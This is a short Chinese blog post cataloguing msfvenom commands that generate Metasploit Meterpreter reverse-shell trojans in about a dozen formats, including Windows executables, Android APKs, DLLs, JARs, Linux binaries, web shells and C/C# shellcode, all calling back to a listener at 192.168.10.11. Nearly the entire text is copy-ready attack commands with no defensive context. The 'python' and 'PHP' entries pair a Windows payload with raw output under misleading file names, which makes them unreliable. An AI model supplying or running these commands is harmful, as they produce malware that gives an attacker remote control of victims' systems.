Drunkmars's Blog

msf生成木马小结

字数统计: 235阅读时长: 1 min
2021/06/13

这里会介绍msfvenom生成木马的n种命令,配合 exploit/multi/handler 模块使用。

exe

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 -f exe > abc.exe 

安卓

1
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=5555 R> apk.apk

DLL

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 -a x86 -f dll > shell.dll

JAVA

1
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 W > text.jar

linux

1
2
3
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 R > /root/Desktop/test 

需要把test加权限 chmod +x ./test

python

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 -f raw > shell.py

PHP

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 -f raw > shell.php

ASP

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 -f asp > shell.asp

ASPX

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 -f aspx > shell.aspx

C shellcode

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 -f c > shellcode.c

C# shellcode

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 -f csharp > shellcode.txt
CATALOG